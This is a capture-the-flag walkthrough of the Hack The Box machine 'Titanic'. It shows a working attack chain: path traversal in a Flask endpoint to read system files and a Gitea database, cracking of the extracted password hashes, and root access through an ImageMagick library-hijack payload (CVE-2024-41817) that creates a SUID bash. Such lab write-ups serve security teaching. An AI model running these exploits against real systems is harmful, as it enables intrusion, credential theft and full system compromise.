Titanic
2025-07-01 10:01
Status: Solved
Difficulty: Easy
Titanic - HTB
Enumeration
The port scan shows us that this is possibly a simple web server with the hostname titanic.htb.
nmap
> nmap -sV 10.10.11.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 09:56 CEST
Nmap scan report for 10.10.11.55
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.32 seconds
ffuf
Let's see what directories we can find with ffuf
> ffuf -u http://titanic.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://titanic.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
book [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 71ms]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 31ms]
:: Progress: [4727/4727] :: Job [1/1] :: 579 req/sec :: Duration: [0:00:09] :: Errors: 0 ::
Not too much to see here, but maybe the book endpoint gives us something. A 405 status means the request used the wrong method; the endpoint most likely accepts POST requests instead of GET requests.
Let's fuzz the subdomains now
> ffuf -u http://10.10.11.55 -H "Host: FUZZ.titanic.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.11.55
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.titanic.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
dev [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 43ms]
:: Progress: [4989/4989] :: Job [1/1] :: 1298 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Looks like dev.titanic.htb also serves some content. This worked because ffuf can enumerate virtual hosts when we supply the Host: FUZZ.titanic.htb header. Add dev.titanic.htb to /etc/hosts so we can view the web page.
titanic.htb
First let's look at titanic.htb.
Looking at the website's landing page we can already see a booking form which sends the booking information to the /book endpoint. After filling the form with dummy information, the response redirects me to a GET request for /download?ticket=d4f5e956-39a2-42af-9c69-5da5ea2ff739.json, which serves the ticket.
This endpoint looks like an attack surface, but I have no clue yet what could be exploitable.
dev.titanic.htb
Next up, on dev.titanic.htb we see a Gitea instance. There are 2 repositories uploaded here: docker-config for the Gitea instance and flask-app for the Flask application we saw on the titanic.htb domain.
The docker-config repo contains some sensitive information inside its mysql/docker-compose.yml file:
version: '3.8'
services:
mysql:
image: mysql:8.0
container_name: mysql
ports:
- "127.0.0.1:3306:3306"
environment:
MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
MYSQL_DATABASE: tickets
MYSQL_USER: sql_svc
MYSQL_PASSWORD: sql_password
restart: always
We have a root password for a MySQL database, but we cannot connect to it yet: we don't have a foothold, and the service only accepts connections from localhost.
Furthermore, we can see the source code of the Flask application we've been looking at on titanic.htb.
The landing page on the /
route:
@app.route('/')
def index():
return render_template('index.html')
The /book
endpoint which is responsible for getting the form data and creating the ticket:
@app.route('/book', methods=['POST'])
def book_ticket():
data = {
"name": request.form['name'],
"email": request.form['email'],
"phone": request.form['phone'],
"date": request.form['date'],
"cabin": request.form['cabin']
}
ticket_id = str(uuid4())
json_filename = f"{ticket_id}.json"
json_filepath = os.path.join(TICKETS_DIR, json_filename)
with open(json_filepath, 'w') as json_file:
json.dump(data, json_file)
return redirect(url_for('download_ticket', ticket=json_filename))
Last but not least, the /download endpoint, which gives us the ticket JSON:
@app.route('/download', methods=['GET'])
def download_ticket():
ticket = request.args.get('ticket')
if not ticket:
return jsonify({"error": "Ticket parameter is required"}), 400
json_filepath = os.path.join(TICKETS_DIR, ticket)
if os.path.exists(json_filepath):
return send_file(json_filepath, as_attachment=True, download_name=ticket)
else:
return jsonify({"error": "Ticket not found"}), 404
One crucial line here to pay attention to is:
json_filepath = os.path.join(TICKETS_DIR, ticket)
So why is this important? First we need to understand how the os.path.join function works:
>>> import os
>>> os.path.join("tickets", "ticket.json")
'tickets/ticket.json'
The result is what we would expect. Since we control the ticket parameter and there is no input sanitization, we could try giving ticket a value like ../../../../etc/passwd, but there is an even easier way to do path traversal here. If os.path.join's second argument starts with /, the function completely ignores the first argument:
>>> os.path.join("tickets", "/etc/passwd")
'/etc/passwd'
Let's try this out on the /download endpoint. Open Burp Suite, intercept the request sent after using the form on the web page, and modify the ticket parameter to /etc/passwd:
GET /download?ticket=/etc/passwd HTTP/1.1
Host: titanic.htb
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titanic.htb/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
The response gives us the proof of concept that, indeed, we can do path traversal with this implementation.
HTTP/1.1 200 OK
Date: Tue, 01 Jul 2025 11:15:32 GMT
Server: Werkzeug/3.0.3 Python/3.10.12
Content-Disposition: attachment; filename="/etc/passwd"
Content-Type: application/octet-stream
Content-Length: 1951
Last-Modified: Fri, 07 Feb 2025 11:16:19 GMT
Cache-Control: no-cache
ETag: "1738926979.4294043-1951-393413677"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslogbinded:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
From this we can see that there is a developer user with a home directory.
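As an aside, the vulnerable join could be fixed by resolving the final path and checking that it stays inside the tickets directory. A hedged sketch (the helper name safe_ticket_path is mine, not from the app's source):

```python
import os

TICKETS_DIR = "tickets"

def safe_ticket_path(ticket: str):
    # Resolve the joined path and require it to stay inside TICKETS_DIR,
    # which defeats both absolute paths and ../ sequences.
    base = os.path.realpath(TICKETS_DIR)
    candidate = os.path.realpath(os.path.join(base, ticket))
    if not candidate.startswith(base + os.sep):
        return None  # traversal attempt rejected
    return candidate

print(safe_ticket_path("/etc/passwd"))       # None
print(safe_ticket_path("../../etc/passwd"))  # None
```

Flask's werkzeug also ships a safe_join helper for exactly this purpose, which the app could have used instead.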
Shell as developer
Trying the path traversal with /home/developer/user.txt, we get the user flag. Doing the same with /root/root.txt doesn't work, so we definitely have to get a foothold on this machine.
We can take a look at Gitea once again. In the docker-config repo, we can see that Gitea is running inside a Docker container and its /data volume is bound to the /home/developer/gitea/data directory on the host. Using our file-read exploit, we should be able to read Gitea's config file.
According to the documentation of gitea:
Customization files described here should be placed in
/data/gitea
directory. If using host volumes, it's quite easy to access these files; for named volumes, this is done through another container or by direct access at/var/lib/docker/volumes/gitea_gitea/_data
. The configuration file will be saved at/data/gitea/conf/app.ini
after the installation.
With this knowledge, and with the information from the docker-compose.yml we found in the Gitea repo, we can try to read this config file:
curl 'http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini'
and the response:
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod
RUN_USER = git
WORK_PATH = /data/gitea
[repository]
ROOT = /data/git/repositories
[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo
[repository.upload]
TEMP_PATH = /data/gitea/uploads
[server]
APP_DATA_PATH = /data/gitea
DOMAIN = gitea.titanic.htb
SSH_DOMAIN = gitea.titanic.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.titanic.htb/
DISABLE_SSH = false
SSH_PORT = 22
SSH_LISTEN_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4
OFFLINE_MODE = true
[database]
PATH = /data/gitea/gitea.db
DB_TYPE = sqlite3
HOST = localhost:3306
NAME = gitea
USER = root
PASSWD =
LOG_SQL = false
SCHEMA =
SSL_MODE = disable
[indexer]
ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve
[session]
PROVIDER_CONFIG = /data/gitea/sessions
PROVIDER = file
[picture]
AVATAR_UPLOAD_PATH = /data/gitea/avatars
REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars
[attachment]
PATH = /data/gitea/attachments
[log]
MODE = console
LEVEL = info
ROOT_PATH = /data/gitea/log
[security]
INSTALL_LOCK = true
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8
PASSWORD_HASH_ALGO = pbkdf2
[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost
[lfs]
PATH = /data/git/lfs
[mailer]
ENABLED = false
[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true
[cron.update_checker]
ENABLED = false
[repository.pull-request]
DEFAULT_MERGE_STYLE = merge
[repository.signing]
DEFAULT_TRUST_MODEL = committer
[oauth2]
JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g
We see a lot of stuff that could be leveraged (like the JWT_SECRET), but the key here is the database. Since we have read access and the Gitea volume is bound to the host filesystem, we can get a hold of this db. To do that, we do the same as before, just with the db path:
curl 'http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db' --output gitea.db
After this we can use the sqlite3 CLI tool to open up this bad boy: sqlite3 gitea.db, just like that.
In sqlite3 we can list the tables of the db with the .tables command (if we are ever unsure, the .help command lists all available commands). After listing the tables, we see that Gitea stores a bunch of stuff.
sqlite> .tables
access oauth2_grant
access_token org_user
action package
action_artifact package_blob
action_run package_blob_upload
action_run_index package_cleanup_rule
action_run_job package_file
action_runner package_property
action_runner_token package_version
action_schedule project
action_schedule_spec project_board
action_task project_issue
action_task_output protected_branch
action_task_step protected_tag
action_tasks_version public_key
action_variable pull_auto_merge
app_state pull_request
attachment push_mirror
auth_token reaction
badge release
branch renamed_branch
collaboration repo_archiver
comment repo_indexer_status
commit_status repo_redirect
commit_status_index repo_topic
commit_status_summary repo_transfer
dbfs_data repo_unit
dbfs_meta repository
deploy_key review
email_address review_state
email_hash secret
external_login_user session
follow star
gpg_key stopwatch
gpg_key_import system_setting
hook_task task
issue team
issue_assignees team_invite
issue_content_history team_repo
issue_dependency team_unit
issue_index team_user
issue_label topic
issue_user tracked_time
issue_watch two_factor
label upload
language_stat user
lfs_lock user_badge
lfs_meta_object user_blocking
login_source user_open_id
milestone user_redirect
mirror user_setting
notice version
notification watch
oauth2_application webauthn_credential
oauth2_authorization_code webhook
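If you prefer scripting to the interactive shell, the same table listing can be done with Python's built-in sqlite3 module by querying sqlite_master. A small sketch, demonstrated on a throwaway in-memory database rather than the real gitea.db:

```python
import sqlite3

def list_tables(con: sqlite3.Connection) -> list:
    # sqlite_master holds the schema; filtering on type='table'
    # mirrors what the .tables command prints.
    rows = con.execute(
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
    ).fetchall()
    return [name for (name,) in rows]

# Demo db; in practice use sqlite3.connect("gitea.db").
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE user (id INTEGER, name TEXT)")
con.execute("CREATE TABLE access_token (id INTEGER)")
print(list_tables(con))  # ['access_token', 'user']
```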
Out of all this, let's start with the user table; maybe we can crack the hashes inside it and gain access to the developer account through SSH. A very basic SQL query dumps the data: SELECT * FROM user;.
sqlite> .headers on
sqlite> select * from user;
id|lower_name|name|full_name|email|keep_email_private|email_notifications_preference|passwd|passwd_hash_algo|must_change_password|login_type|login_source|login_name|type|location|website|rands|salt|language|description|created_unix|updated_unix|last_login_unix|last_repo_visibility|max_repo_creation|is_active|is_admin|is_restricted|allow_git_hook|allow_import_local|allow_create_organization|prohibit_login|avatar|avatar_email|use_custom_avatar|num_followers|num_following|num_stars|num_repos|num_teams|num_members|visibility|repo_admin_change_team_access|diff_view_style|theme|keep_activity_private
1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0
2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0
We see administrator and developer users here! Let's get the name, password hash, and salt in a cleaner format.
sqlite> select name, passwd, salt from user;
name|passwd|salt
administrator|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|2d149e5fbd1b20cf31db3e3c6a28fc9b
developer|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|8bf3e3452b78544f8bee9400d6936d34
We need to crack these, and for that we can use hashcat. From the previous dump we know that Gitea uses the pbkdf2$50000$50 algorithm, where 50000 is the number of iterations (and 50 the derived key length in bytes). The hashcat example-hashes page shows that hashcat expects the sha256:1000:MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt format for the PBKDF2-HMAC-SHA256 algo, so basically sha256:<iterations>:<salt in base64>:<hash in base64>. We need to transform our output into this format, which is not trivial but also nothing serious with a bit of shell scripting:
sqlite3 gitea.db "select passwd, salt, name from user" | while read line; do digest=$(echo $line | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo $line | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $line | cut -d'|' -f3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hash
We could have done that manually, but we love automation. The output is:
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
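The same transformation can be written in Python as a readable alternative to the shell one-liner; the digest and salt below are the administrator values from the dump:

```python
import base64

def gitea_to_hashcat(name: str, passwd_hex: str, salt_hex: str,
                     iters: int = 50000) -> str:
    # Decode the hex-encoded digest and salt, re-encode them as base64,
    # and emit hashcat's PBKDF2-HMAC-SHA256 line format.
    digest_b64 = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    salt_b64 = base64.b64encode(bytes.fromhex(salt_hex)).decode()
    return f"{name}:sha256:{iters}:{salt_b64}:{digest_b64}"

print(gitea_to_hashcat(
    "administrator",
    "cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136",
    "2d149e5fbd1b20cf31db3e3c6a28fc9b",
))
# administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
```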
Let's feed this into hashcat.
hashcat gitea.hash /usr/share/wordlists/rockyou.txt --username
After a minute or so, we see that we have already cracked 1 of the 2 passwords:
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
The password is 25282528 and it belongs to the user developer. There is also a developer user on the target machine, so let's try it over SSH. Aaaaaaand it works :). We have access to the developer user.
The user.txt flag is there in the home directory, in case we haven't already collected it with our path traversal.
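As a sanity check, we can reproduce Gitea's PBKDF2 computation offline with Python's hashlib, plugging in the developer salt and digest from the database dump:

```python
import hashlib

# Values for the developer user, copied from the gitea.db dump.
salt = bytes.fromhex("8bf3e3452b78544f8bee9400d6936d34")
expected = "e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56"

# pbkdf2$50000$50 -> PBKDF2-HMAC-SHA256, 50000 iterations, 50-byte key.
derived = hashlib.pbkdf2_hmac("sha256", b"25282528", salt, 50000, dklen=50)
print(derived.hex() == expected)
```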
Shell as root
There was nothing interesting in the user's home directory, and only this user has a home directory on this machine. After some manual traversing, I stumbled upon the /opt directory.
developer@titanic:/opt$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Feb 7 10:37 .
drwxr-xr-x 19 root root 4096 Feb 7 10:37 ..
drwxr-xr-x 5 root developer 4096 Feb 7 10:37 app
drwx--x--x 4 root root 4096 Feb 7 10:37 containerd
drwxr-xr-x 2 root root 4096 Feb 7 10:37 scripts
The app dir contains the Flask application we've been looking at. However, the scripts dir holds an interesting bash script.
developer@titanic:/opt$ cat scripts/identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
This script writes image metadata to a metadata.log file using ImageMagick's identify command.
developer@titanic:/opt$ cat /opt/app/static/assets/images/metadata.log
/opt/app/static/assets/images/luxury-cabins.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 280817B 0.000u 0:00.003
/opt/app/static/assets/images/entertainment.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 291864B 0.000u 0:00.000
/opt/app/static/assets/images/home.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 232842B 0.000u 0:00.000
/opt/app/static/assets/images/exquisite-dining.jpg JPEG 1024x1024 1024x1024+0+0 8-bit sRGB 280854B 0.000u 0:00.000
We can also deduce from metadata.log's modification time that this script runs practically every minute, so there is probably a cronjob behind it.
developer@titanic:/opt$ ls -l /opt/app/static/assets/images/metadata.log; sleep 50; ls -l /opt/app/static/assets/images/metadata.log
-rw-r----- 1 root developer 442 Jul 2 20:38 /opt/app/static/assets/images/metadata.log
-rw-r----- 1 root developer 442 Jul 2 20:39 /opt/app/static/assets/images/metadata.log
It's obvious we have to find a way to exploit magick
.
ImageMagick
developer@titanic:/opt/app/static/assets/images$ magick -version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)
Searching for a CVE for ImageMagick 7.1.1-35 quickly turns up a PoC for CVE-2024-41817. The exploit abuses the way this ImageMagick 7.1.1 build is compiled: it includes the current working directory in the paths searched for shared libraries and configuration files. This makes it possible to run arbitrary code through magick if we control the directory it is run from. The PoC introduces 2 methods, but I only managed to get the second one working.
developer@titanic:/opt/app/static/assets/images$ cat poc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("id");
exit(0);
}
The cronjob runs magick in the /opt/app/static/assets/images directory, so that's where I copied the PoC from the link above.
Compile the PoC into a shared library:
gcc -x c -shared -fPIC -o ./libxcb.so.1 poc.c
developer@titanic:/opt/app/static/assets/images$ magick /dev/null /dev/null
uid=1000(developer) gid=1000(developer) groups=1000(developer)
Running magick with the PoC in place confirms the vulnerability.
developer@titanic:/opt/app/static/assets/images$ cat poc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
system("cp /bin/bash /tmp/v41k0 && chmod +s /tmp/v41k0");
exit(0);
}
Instead of running id, we run the usual payload for getting a root shell, outside of the magick process itself: copy /bin/bash to /tmp and set the SUID bit on the copy. Since the cronjob runs magick as root, this leaves us with a root-owned bash binary with the SUID bit set.
We need to compile the code again, the same way we did before, and then wait for the cronjob to run.
After the cronjob has run, we can use our SUID copy of /bin/bash at /tmp/v41k0 to pop a root shell and read the root flag, bringing the challenge to an end.
developer@titanic:/opt/app/static/assets/images$ /tmp/v41k0 -p
v41k0-5.1# id
uid=1000(developer) gid=1000(developer) euid=0(root) egid=0(root) groups=0(root),1000(developer)
v41k0-5.1# cat /root/root.txt
******************148d3
v41k0-5.1#